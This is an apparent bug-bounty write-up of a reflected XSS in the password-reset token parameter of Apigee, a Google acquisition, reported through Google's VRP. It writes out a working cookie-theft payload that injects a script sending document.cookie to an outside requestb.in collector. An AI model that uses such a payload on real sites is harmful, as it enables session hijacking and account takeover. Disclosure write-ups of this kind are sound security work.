Google Acquisition XSS (Apigee)
So when I was trying to verify some Google acquisition website
I enter apigee.com which provides API management, so as always I start my burp suite and I try to verify all the functions as possible,
On the first try, everything was secure and all my first test failed, but as a bug hunter it should not be 100% secure and nothing is safe, So I log out and start to check the login and register option, look all right here
at some point, I tried to check the password reset action, get a link in my email account that looks like this
link :
https://api.accounts.apigee.com/management/users/[REDACTED]/resetpw?token=ZW0tsHaU-REDACTED-eeTDi2YRIN1CICmFjOSSE2JvllO_-REDACTED-
Here, I have the idea to try to bypass the token and obtain a valid link for all users, which allows me to update any user password, but this failed too and can’t bypass it
when I was trying to edit the link and change the token code, I saw something normal for me, it looks like this entry has not been filtered here, so I tried to send some XSS payload as a test.
And here where things begin 😃
let's steal some cookies 😍
as it's not legal to hack someone account, I tested in my own account
create first the payload :
https://api.accounts.apigee.com/management/users/xxxxxx/resetpw?token=xxxxxxx"><script>new Image().src=’https://requestb.in/xxxxxx?code='+document.cookie</script><a href=”
ON CLICK & All cookies will be sent to us😅
Report time, I submitted this using their VRP program. I got the following mail
Jul 11, 2017: “Nice catch!” answer 😍 love these words
